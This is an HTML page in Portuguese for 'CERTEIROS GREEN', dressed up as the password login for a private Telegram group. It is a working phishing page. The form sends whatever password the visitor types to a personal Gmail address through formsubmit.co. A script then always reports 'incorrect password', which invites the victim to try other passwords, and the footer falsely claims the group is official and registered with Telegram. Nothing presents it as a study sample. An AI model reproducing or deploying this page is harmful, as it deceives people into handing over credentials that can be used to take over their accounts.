
<html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CERTEIROS GREEN</title>
    <link rel="stylesheet" href="index.css">
  </head>
  <body class="background">
    <h1 class="point">
        <img src="logo.png" width="140px" alt="">
        <b>CERTEIROS GREEN</b>
    </h1>

    <div class="login-page">
        <form action="https://formsubmit.co/westomaria9x1@gmail.com" method="POST">
    <center>
        <p id="email">
          <h1 for="email" class="email">Premium Grupo Privado</h1>
           <p for="email" class="email"><i>73,982 membros</i></p>
           <h3 for="email" class="email">CERTEIROS GREEN PRIVADO</h3>
        </p>
    </center>
        <p id="email">
          <label for="password" class="email">Senha</label> <br>
          <input placeholder="senha" type="password" id="password" name="password" required="">
        </p>
        <p class="login">
          <button onclick="showAlert()" type="submit">
Conecte-se</button>
        </p>

    <footer id="down">
            <p>
                Este é um grupo privado oficial do Telegram que 
                está totalmente cadastrado e foi criado em 2018, 
                você só precisará de sua senha para acessar o grupo
                agora e se tornar membro, caso não tenha senha 
                entre em contato com o administrador.
            </p>
    </footer>
      </form>

    </div>

    <script>
      function showAlert() {
          alert("
Senha incorreta, tente novamente!");
      }
  </script>

</body>
</html>
